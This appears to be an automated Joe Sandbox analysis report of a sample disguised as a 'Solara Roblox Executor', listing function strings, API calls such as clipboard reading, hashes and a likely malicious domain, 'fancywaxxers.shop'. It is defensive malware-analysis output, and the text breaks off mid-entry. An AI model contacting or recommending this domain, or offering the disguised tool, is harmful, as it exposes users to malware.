E-A/, xrefs: 0040C907
@^_T, xrefs: 0040C772
8]S_, xrefs: 0040C98B
6E+G, xrefs: 0040C949
&A-C, xrefs: 0040C93E
M%E', xrefs: 0040C8F1
>M"O, xrefs: 0040C95F
@R_L, xrefs: 0040C77D
<Y?[, xrefs: 0040C980
I)^+, xrefs: 0040C8FC
5Q<S, xrefs: 0040C96A
jabc, xrefs: 0040C996
fancywaxxers.shop, xrefs: 0040CA4B
O9M;, xrefs: 0040C928
P!N#, xrefs: 0040C8E6

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: &A-C$5Q<S$6E+G$7U9W$8]S_$<Y?[$>M"O$@R_L$@^_T$E-A/$I)^+$M%E'$O9M;$P!N#$WHwd$eI?K$fancywaxxers.shop$jabc
API String ID: 0-3167547214
Opcode ID: 79b69f35623f4b1030c7d79dd592a2d87726d3e28b20378e26cdaad2eeeae4be
Instruction ID: 0a0402f88f36a4f345282987371d5ce03231b73cb0afbcd0892d2d12bc10a949
Opcode Fuzzy Hash: 79b69f35623f4b1030c7d79dd592a2d87726d3e28b20378e26cdaad2eeeae4be
Instruction Fuzzy Hash: EE81EFB594D3D08AC331CF6194987EBBFE1ABE6701F188A6DC4C96B352D7380505CB9A

Function 00422810 Relevance: 20.4, Strings: 16, Instructions: 446COMMON

Download Yara Rule

Strings

&A-C, xrefs: 00422BAD
M%E', xrefs: 00422B7C
<Y?[, xrefs: 00422BD7
eI?K, xrefs: 00422BBB
7U9W, xrefs: 00422BD0
8]S_, xrefs: 00422BDE
>M"O, xrefs: 00422BC2
P!N#, xrefs: 00422B75
E-A/, xrefs: 00422B8A
6E+G, xrefs: 00422BB4
jabc, xrefs: 00422BE5
O9M;, xrefs: 00422B9F
p, xrefs: 00422992
5Q<S, xrefs: 00422BC9
fancywaxxers.shop, xrefs: 00422C73
I)^+, xrefs: 00422B83

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: &A-C$5Q<S$6E+G$7U9W$8]S_$<Y?[$>M"O$E-A/$I)^+$M%E'$O9M;$P!N#$eI?K$fancywaxxers.shop$jabc$p
API String ID: 0-452036927
Opcode ID: b8eb50bd7fd2800a6558e4d1ac56e47488d5981e48669be42c7d8a9b278f0bec
Instruction ID: f6942c945ab490a1a029ac6160cd29665c225949e07297181d48f6d0b3406f3c
Opcode Fuzzy Hash: b8eb50bd7fd2800a6558e4d1ac56e47488d5981e48669be42c7d8a9b278f0bec
Instruction Fuzzy Hash: 41D189B4A04755ABDB24CF65DD813BEBBB0FF56300F5841AEC441AB782D7788942CB98

Function 00426800 Relevance: 10.6, Strings: 8, Instructions: 618COMMON

Download Yara Rule

Strings

AwzM, xrefs: 004273BF
rwIy, xrefs: 0042739E
s, xrefs: 004270AE
KtB, xrefs: 00427445
V_Q\, xrefs: 004273D5
RyAt, xrefs: 00427405, 00427420, 00427427
ltB, xrefs: 00427466
2uB, xrefs: 004272C8, 0042752C, 00427551

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: s$2uB$AwzM$KtB$RyAt$V_Q\$ltB$rwIy
API String ID: 0-3982219918
Opcode ID: 04cf2488d4bc7c23fb7954dd9db05926e0d35dada1e1450b27b3acc842a5f796
Instruction ID: 1bf6d5eb903e3478407aa4a2de14c7a371cc740c8e783bea0656398b78c4a1e5
Opcode Fuzzy Hash: 04cf2488d4bc7c23fb7954dd9db05926e0d35dada1e1450b27b3acc842a5f796
Instruction Fuzzy Hash: 1D22F1B160C3459FC724DF29D89176BB7E2FBC5314F48892DE4898B392DB389905CB86

Function 0041A0F0 Relevance: 10.4, APIs: 2, Strings: 3, Instructions: 1687COMMON

Download Yara Rule

APIs

Part of subcall function 0043C6B0: LdrInitializeThunk.NTDLL(0043FA9D,?,00000018,?,?,00000018,?,?,?), ref: 0043C6DE

FreeLibrary.KERNEL32(?), ref: 0041A7BA
FreeLibrary.KERNEL32(?), ref: 0041A86B

Strings

AC, xrefs: 0041A5B7
wu, xrefs: 0041A52A
\], xrefs: 0041A5EF

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: \]$wu$AC
API String ID: 764372645-2495816402
Opcode ID: beb79ec4ec5c1b30008b46b94c0092cfda98b8f3f77dbb616830ec245ae85eda
Instruction ID: b7af8e654c9e5ad4156cae4c9b92cad71f5d0f1b95b6ad258964b00ca882822e
Opcode Fuzzy Hash: beb79ec4ec5c1b30008b46b94c0092cfda98b8f3f77dbb616830ec245ae85eda
Instruction Fuzzy Hash: DCA257767083015BE3248F29CC857AFBBD2EBC5314F19893EE4D487392E77898958786

Function 00433070 Relevance: 9.1, APIs: 6, Instructions: 118clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00433080
GetClipboardData.USER32 ref: 0043309B
GlobalLock.KERNEL32 ref: 004330BA
CloseClipboard.USER32 ref: 004331F5

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: Clipboard$CloseDataGlobalLockOpen
String ID:
API String ID: 1494355150-0
Opcode ID: b14e6c6b015cf6f36e01bcf364146bf2efebe57500bb90dfd55a693b53ac9613
Instruction ID: ff6b635dae625c362d26e4ac503e69b89fde9966024dcd649795668d665db029
Opcode Fuzzy Hash: b14e6c6b015cf6f36e01bcf364146bf2efebe57500bb90dfd55a693b53ac9613
Instruction Fuzzy Hash: EC4191B150C7828ED300AF7C994936FBFE0AB96324F054A6EF4D5863D1D63886898757

Function 00429195 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 304COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 004291E0

Strings

"#`, xrefs: 00429105
"#`, xrefs: 004290B3

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: "#`$"#`
API String ID: 237503144-2918922839
Opcode ID: 3560c99ad8369be48d29543379f91eacd884e09f4646e343d12764f8cd26e683
Instruction ID: bb1af0155e8c97e772b3ade1192a0bbdeee5ee209ff73428faf885dc7862e06e
Opcode Fuzzy Hash: 3560c99ad8369be48d29543379f91eacd884e09f4646e343d12764f8cd26e683
Instruction Fuzzy Hash: FCA1057225C3668FD718CF68988179FB7E1EBC5304F01883DE995DB281D674D80A87C2

Function 0042C20F Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 151COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 0042C361

Strings

VTHU, xrefs: 0042C288
(%, xrefs: 0042C37A
i` [, xrefs: 0042C372
{PY_, xrefs: 0042C388, 0042C3AD

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: FreeLibrary
String ID: (%$VTHU$i` [${PY_
API String ID: 3664257935-4244161340
Opcode ID: 25cdf1e8e4acfa0086cdd96e89cdf7886e21c574233df5217ac2fd4079109afe
Instruction ID: 21d45a69875112c23b4c5be9adeda8192fb16588a1cfefe4b9d9260d7bd5bea9
Opcode Fuzzy Hash: 25cdf1e8e4acfa0086cdd96e89cdf7886e21c574233df5217ac2fd4079109afe
Instruction Fuzzy Hash: D14126706083928BD3268F259CA4BAFBFA0EF93310F24495DE4D65B392D738440587AB

Function 0041C8B0 Relevance: 8.2, Strings: 6, Instructions: 694COMMON

Download Yara Rule

Strings

Vw1q, xrefs: 0041CBC3
{u, xrefs: 0041CBBB
8h/n, xrefs: 0041CF9F
:G!A, xrefs: 0041CBA3
_\, xrefs: 0041CF47
fg, xrefs: 0041CBE3

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: 8h/n$:G!A$Vw1q$_\$fg${u
API String ID: 0-571651433
Opcode ID: 3e64fb3b6bbcadac1e68f2cfb04d1c419dd19bd9cddeb80b9f54e814e34da8e2
Instruction ID: 4d587711fa9bf315219b08e5eacbfd1868b7a59e3a746aa50b59dccfd34602ab
Opcode Fuzzy Hash: 3e64fb3b6bbcadac1e68f2cfb04d1c419dd19bd9cddeb80b9f54e814e34da8e2
Instruction Fuzzy Hash: AC124476A4C3008BD714CF69D88266BBBE2EFD6304F08882DF4C58B351E7398945CB5A

Function 0041E660 Relevance: 7.1, Strings: 5, Instructions: 827COMMON

Download Yara Rule

Strings

4, xrefs: 0041ED0E
UW(U, xrefs: 0041E9DC
Ur, xrefs: 0041E812
H?6;, xrefs: 0041E9C6
,13-, xrefs: 0041E9BB

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: ,13-$4$H?6;$UW(U$Ur
API String ID: 0-623118844
Opcode ID: 0c0ea0f48cde75f1d76b868ba7f85f9ce3d48430434990ea6297f14b2cd37fbe
Instruction ID: 7317f9598c7517db43dbe8c3128e74df408d1825271b4f98ac102b84f177ffd6
Opcode Fuzzy Hash: 0c0ea0f48cde75f1d76b868ba7f85f9ce3d48430434990ea6297f14b2cd37fbe
Instruction Fuzzy Hash: DE426B7550C3918BC721CF2688407AFBBE1AFD6310F184A6EECE5473D2E6358845CB86

Function 0041644B Relevance: 4.3, Strings: 3, Instructions: 580COMMON

Download Yara Rule

Strings

N/}), xrefs: 00416796
D, xrefs: 00416906
rs, xrefs: 00416A4D

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: D$N/})$rs
API String ID: 0-3451683530
Opcode ID: 8484fa28704cc6668a4851017a5de8ee74215d17a58d8bcb956ac78f233524bb
Instruction ID: 074e1bf9f06243e5a214ac73fc47715d135f02f936c9b1432630660c01d6db87
Opcode Fuzzy Hash: 8484fa28704cc6668a4851017a5de8ee74215d17a58d8bcb956ac78f233524bb
Instruction Fuzzy Hash: EE128AB41083818BD324CF25C4A17ABBBF1EFD1319F198A5DD4C99B391E778844ACB96

Function 00426DB6 Relevance: 4.3, Strings: 3, Instructions: 503COMMON

Download Yara Rule

Strings

IRSG, xrefs: 00426EB2
"nB, xrefs: 00426E17
MJHD, xrefs: 00426EBA

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: "nB$IRSG$MJHD
API String ID: 0-3654733057
Opcode ID: d0727302d58e24938a0dee450b46ea026822f247fac10a7e0a0defa56bd75230
Instruction ID: bef73ba0cce5b457ce1c899b5e22c80b463801814e86bfb7c3c5eca358ae516b
Opcode Fuzzy Hash: d0727302d58e24938a0dee450b46ea026822f247fac10a7e0a0defa56bd75230
Instruction Fuzzy Hash: B00210B560C3918FD7108F25D88166BBBE2AFD6314F15882EE4C59B352DB78D806CB46

Function 00422130 Relevance: 4.2, Strings: 3, Instructions: 455COMMON

Download Yara Rule

Strings

u7k1, xrefs: 00422150
23, xrefs: 00422158
n;c5, xrefs: 00422160

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: 23$n;c5$u7k1
API String ID: 0-1212525841
Opcode ID: b04af375faed367ad06554eb19e030d3a8654fd572cf190bbc501d115a635120
Instruction ID: d503fa6d027ef4ecace00d86ef68f704507f2347e615acfd5cb0330a872e39a3
Opcode Fuzzy Hash: b04af375faed367ad06554eb19e030d3a8654fd572cf190bbc501d115a635120
Instruction Fuzzy Hash: 9FC17972B042206BD714DB24EC5367BB3E1EF81324F49952EEC8697391E67CD905C3AA

Function 00420A90 Relevance: 4.2, Strings: 3, Instructions: 444COMMON

Download Yara Rule

Strings

1., xrefs: 00420DF8
QF?E, xrefs: 00420E30
?F?E, xrefs: 00420DFF

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: 1.$?F?E$QF?E
API String ID: 0-340704800
Opcode ID: 9bc6299e8139cda84109b6c7b3e53d2c1f196f73f2354e7d581e60c09bc30936
Instruction ID: f4cdcd463673ede1faf1fcca30bdd9374db74c51598836d24eeffaead2554c88
Opcode Fuzzy Hash: 9bc6299e8139cda84109b6c7b3e53d2c1f196f73f2354e7d581e60c09bc30936
Instruction Fuzzy Hash: CBC131B06183108BD724CF25D89276BBBF1FF92354F448A1DE4C28B3A1E7789801CB96

Function 00416CC8 Relevance: 4.0, Strings: 3, Instructions: 298COMMON

Download Yara Rule

Strings

D, xrefs: 00416906
rs, xrefs: 00416A4D
N/}), xrefs: 00416C66

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: D$N/})$rs
API String ID: 0-3451683530
Opcode ID: 581cc1515653bfb34a6bddbbe29ddc4bf41ad911e0114918d0ba5e39550539e6
Instruction ID: 11e7c06764aa7a11193eb6d0d5c473ff25016c8d05d03320204534f07612e30d
Opcode Fuzzy Hash: 581cc1515653bfb34a6bddbbe29ddc4bf41ad911e0114918d0ba5e39550539e6
Instruction Fuzzy Hash: E0A17BB41183818BD3308F25C4517ABBBF1EFC2319F158A5EE4C99B350E7798846CB96

Function 0042C5AC Relevance: 3.9, Strings: 3, Instructions: 191COMMON

Download Yara Rule

Strings

<BPm, xrefs: 0042C6D7, 0042C6A0
<BPm, xrefs: 0042C7C9
@[YY, xrefs: 0042C752

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: <BPm$<BPm$@[YY
API String ID: 0-4004820647
Opcode ID: c435bf647f37dadb9d421b84b1cf70e8aa0082771fdcacca727cb10a987324ed
Instruction ID: 4cc00e460a4ad2b70a6d5be8106dfe473e3c2fa048093029565a12a76f4a1047
Opcode Fuzzy Hash: c435bf647f37dadb9d421b84b1cf70e8aa0082771fdcacca727cb10a987324ed
Instruction Fuzzy Hash: FA514C7160C3E18ACB398F3990D03BBBBD2AFE7205F5845ADC4D99B382C63840068B56

Function 0042C600 Relevance: 3.9, Strings: 3, Instructions: 188COMMON

Download Yara Rule

Strings

<BPm, xrefs: 0042C6D7, 0042C6A0
<BPm, xrefs: 0042C7C9
@[YY, xrefs: 0042C752

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: <BPm$<BPm$@[YY
API String ID: 0-4004820647
Opcode ID: 4e4ec283cf2b06837c1c5385cda95729b63fc27ff3c9d6a601c6414bbe66a819
Instruction ID: 7a658c6c4bd32708723c2d168bb25c792060f5c9bfbc8c0d13b25a40fca020c0
Opcode Fuzzy Hash: 4e4ec283cf2b06837c1c5385cda95729b63fc27ff3c9d6a601c6414bbe66a819
Instruction Fuzzy Hash: E1511C7160C3D18ADB398F3990E43BBBBD29FE3305F6855ADC4D69B382D63940068B56

Function 00417957 Relevance: 3.9, Strings: 3, Instructions: 186COMMON

Download Yara Rule

Strings

Q^, xrefs: 00417AF4
IU, xrefs: 00417B96
~|, xrefs: 00417A9C

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: IU$Q^$~|
API String ID: 0-1088907063
Opcode ID: 71630cd5531b9ef4dec250e8d57c94be989761556b92c27b1ac97d01023745c7
Instruction ID: 6df6e0cfba5c95a8eff5d94cf930419a97e0658a5cfe043863ebd062064c7be7
Opcode Fuzzy Hash: 71630cd5531b9ef4dec250e8d57c94be989761556b92c27b1ac97d01023745c7
Instruction Fuzzy Hash: 997153B160D3828BE3358F26C5913EBBBF1EBD6304F04892DD8C84B341DB7895468B86

Function 0042C569 Relevance: 3.9, Strings: 3, Instructions: 142COMMON

Download Yara Rule

Strings

<BPm, xrefs: 0042C6D7, 0042C6A0
<BPm, xrefs: 0042C7C9
@[YY, xrefs: 0042C752

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: <BPm$<BPm$@[YY
API String ID: 0-4004820647
Opcode ID: 934050c5b0141aaebcf3420aa3f0bdf4bd5c8bb68b0f199e38c47e6b315c551a
Instruction ID: 57b283e37f3154f442c2f626274166c32a91ca54069e14450e9584fe66ae8e3e
Opcode Fuzzy Hash: 934050c5b0141aaebcf3420aa3f0bdf4bd5c8bb68b0f199e38c47e6b315c551a
Instruction Fuzzy Hash: 9441FA7161C3E18ACB398F3990D43BBBBE16FA7205F5845AEC4D59B382C73940068B56

Function 0042C20A Relevance: 3.8, Strings: 3, Instructions: 32COMMON

Download Yara Rule

Strings

(%, xrefs: 0042C37A
i` [, xrefs: 0042C372
{PY_, xrefs: 0042C388, 0042C3AD

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: (%$i` [${PY_
API String ID: 0-690263851
Opcode ID: d864e012e642d7019a3f652b36d1fcbf554507e9d811b4c6a54bc9a8b232019c
Instruction ID: 0a23c193bc53a9e4a44044f81f6f0e042422c9edda70d41b8211f96d6637d2ed
Opcode Fuzzy Hash: d864e012e642d7019a3f652b36d1fcbf554507e9d811b4c6a54bc9a8b232019c
Instruction Fuzzy Hash: 59F06D302083828AC305CF39A9A486BFFE4DB97664F641E2DA592D72D1C634C50687AA

Function 00417582 Relevance: 2.8, Strings: 2, Instructions: 344COMMON

Download Yara Rule

Strings

L4, xrefs: 00417660
PZ[X, xrefs: 004175C7

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: InitializeThunk
String ID: PZ[X$L4
API String ID: 2994545307-2332103679
Opcode ID: 87bb8333028b02e84959bb826c8766ce2e404ac98ad40eed4c6ac53b4e33a90f
Instruction ID: 49bc7c50038655529f9995de5aa6b73d8f67cd56c256462bcf22c1ae3a81906e
Opcode Fuzzy Hash: 87bb8333028b02e84959bb826c8766ce2e404ac98ad40eed4c6ac53b4e33a90f
Instruction Fuzzy Hash: 47B107766083528BD7288F28DC917BFB3E1EFC5314F15883DE58A97291EB78A841C785

Function 00425A00 Relevance: 2.8, Strings: 2, Instructions: 262COMMON

Download Yara Rule

Strings

_, xrefs: 00425B5A
vw, xrefs: 00425C8E

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: _$vw
API String ID: 0-366109380
Opcode ID: 54e5d649cd2e4692caf1deba0cdb3e0e9d9c888294efb2b2f3bd66271a1b0bd0
Instruction ID: 7f8a6c08207e33933c48c22497a2f9278b244ce11f01d9e00712ae9ff2e0b94b
Opcode Fuzzy Hash: 54e5d649cd2e4692caf1deba0cdb3e0e9d9c888294efb2b2f3bd66271a1b0bd0
Instruction Fuzzy Hash: 297155B16083048BC714EF25E89276BBBF1EFD1354F988A2DE4C18B391E7789505CB4A

Function 00408DE0 Relevance: 2.8, Strings: 2, Instructions: 255COMMON

Download Yara Rule

Strings

MKO, xrefs: 0040905E
O, xrefs: 00408F32

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: MKO$O
API String ID: 0-1176093571
Opcode ID: 8d33f979c90a24fca7a00c12b245d059880a234b0252b8d5dab52824876b7727
Instruction ID: 0ae20e86b8a161806dee4b124e76371130a3ba0685868e5c34c1fb5f652fb9a7
Opcode Fuzzy Hash: 8d33f979c90a24fca7a00c12b245d059880a234b0252b8d5dab52824876b7727
Instruction Fuzzy Hash: AA71186120C3828BD3198F3984A077BFFE19FA3214F18597DE4D297382D77D8909875A

Function 004296D5 Relevance: 2.6, Strings: 2, Instructions: 52COMMON

Download Yara Rule

Strings

X^D\, xrefs: 00429715
DRIP, xrefs: 004296F8

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: DRIP$X^D\
API String ID: 0-91992238
Opcode ID: 68f0531f6d0b959cce85cae1e16b2e600bfa4373815b459f54189735d722ece8
Instruction ID: d79ac7cf482df1d01abe62a05940d775e2eb21aa50623c3bbd7bf635fb37306d
Opcode Fuzzy Hash: 68f0531f6d0b959cce85cae1e16b2e600bfa4373815b459f54189735d722ece8
Instruction Fuzzy Hash: B201C42432C7A0CBD7118F285490767AFE25BC3754FB8196DD4D59B352C2298C06CB8A

Function 00422D94 Relevance: 2.0, Strings: 1, Instructions: 723COMMON

Download Yara Rule

Strings

25B, xrefs: 00423520

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: 25B
API String ID: 0-3796699878
Opcode ID: d150d074dd6b2455100738e6367b80a590ac1a0779f213c14122994e8a6a1064
Instruction ID: 405674f7bc34d0ea812f454e3d689863d38b7e88d6049d5d0e29b99367aebabd
Opcode Fuzzy Hash: d150d074dd6b2455100738e6367b80a590ac1a0779f213c14122994e8a6a1064
Instruction Fuzzy Hash: 8B321176A04212CFDB18CF68DC916BE73B2FB89311F1A81B9D802A73A5D7389D51CB54

Function 0043B210 Relevance: 1.8, Strings: 1, Instructions: 592COMMON

Download Yara Rule

Strings

f, xrefs: 0043B3F0

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: bd47dde1f40b33a1fab791ec94e6ff0b794a6c620c0205e332e95bf2a5364547
Instruction ID: b828f4544e9affbb4f8d631a5f2a1d6666d2d51da9564fba8a58fa6a7736e310
Opcode Fuzzy Hash: bd47dde1f40b33a1fab791ec94e6ff0b794a6c620c0205e332e95bf2a5364547
Instruction Fuzzy Hash: 2812F4716083118BD714CF24C89076FBBE2EBC9324F289A2EE6D597391D738D8458BD6

Function 00417F48 Relevance: 1.7, Strings: 1, Instructions: 424COMMON

Download Yara Rule

Strings

|, xrefs: 004183DB

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 4cde0023bf0bf93d460d1c58ce94bf8605f05d85e5f6a093473c425404ce049f
Instruction ID: fd3997e13e197f00a57f2f26a6d9b4531a04cd8dfd78d516a4d3cdb692330be1
Opcode Fuzzy Hash: 4cde0023bf0bf93d460d1c58ce94bf8605f05d85e5f6a093473c425404ce049f
Instruction Fuzzy Hash: CBD1353564C3418BD728CF39C8913ABBBE2AFD6314F18892EE4D997391DB389845C746

Function 004386F9 Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

@A, xrefs: 00438A27

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: @A
API String ID: 0-2960862460
Opcode ID: 950c1b8af1eaac46aae3cda4d5f298d263ae63ec9d441d0849551497eed8f4b5
Instruction ID: 3a322d5aa285781219aea204ca36b90a866ebcf7f7c98695be16e6dee4ec5bc0
Opcode Fuzzy Hash: 950c1b8af1eaac46aae3cda4d5f298d263ae63ec9d441d0849551497eed8f4b5
Instruction Fuzzy Hash: 9ED1123E528311CBCB189F28D85117BB7A2FF4A751F0B887DD5814B2A0EB3A8952C755

Function 00421D50 Relevance: 1.6, Strings: 1, Instructions: 355COMMON

Download Yara Rule

Strings

uw, xrefs: 00421DFF, 00421E07

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: uw
API String ID: 0-2711446736
Opcode ID: 812dabfa2fe8249c667140d2480eeaa38e923c29aaf17f2c61fccdb37c18cdef
Instruction ID: e72cbe22eef0dd791d4b7d4f7a5d27603352ff7668c6b160e8c84b58288f8a9d
Opcode Fuzzy Hash: 812dabfa2fe8249c667140d2480eeaa38e923c29aaf17f2c61fccdb37c18cdef
Instruction Fuzzy Hash: 57A156B16043119BD710DF24DC81B6BB3A1FF94314F14892EF98A8B391E778E905C796

Function 0041993B Relevance: 1.6, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

L4, xrefs: 00419A30

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: L4
API String ID: 0-282083451
Opcode ID: 79b5eb087dd7f1f3435b92eb2687bb2369e45fd830a936d407f16e20e03f05ea
Instruction ID: c34a2a58ddc122c53d27d8cfeb424a434aaa89fb15086263f759e7bc79f4742b
Opcode Fuzzy Hash: 79b5eb087dd7f1f3435b92eb2687bb2369e45fd830a936d407f16e20e03f05ea
Instruction Fuzzy Hash: 8AA12A7260C2528FD724CF28D4A17ABB7E2ABD5314F15893EE4DA87382DA34EC45CB45

Function 00415B6C Relevance: 1.6, Strings: 1, Instructions: 311COMMON

Download Yara Rule

Strings

vZA, xrefs: 00415C78, 00415C96

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

